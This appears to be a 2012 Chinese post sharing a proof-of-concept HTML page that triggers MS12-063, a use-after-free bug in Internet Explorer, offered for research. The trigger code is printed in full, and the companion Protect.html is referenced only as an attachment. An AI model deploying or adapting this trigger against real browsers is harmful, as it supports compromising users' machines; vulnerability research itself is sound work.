最新MS12-063 POC

2012-09-25 17:39:40 36 2858
最新的MS12-063 IE 漏洞的poc样本,由内存释放引发的use after free漏洞,有兴趣的可以研究。

poc.htm
<html>
        <body>

                <SCRIPT>
                        var times = 0;
                        var jifud = new Array();
                        while(times < 100) {
                                jifud[times] = window.document.createElement("img");
                                jifud[times]["src"] = "a";
                                times++;
                        }
                </SCRIPT>
        xxxx
        <script>document.body.innerHTML="x<iframe src=Protect.html width=10 height=1></iframe>";</script>
        </body>
</html>
Protect.html见附件。


关于作者

评论36次

要评论?请先  登录  或  注册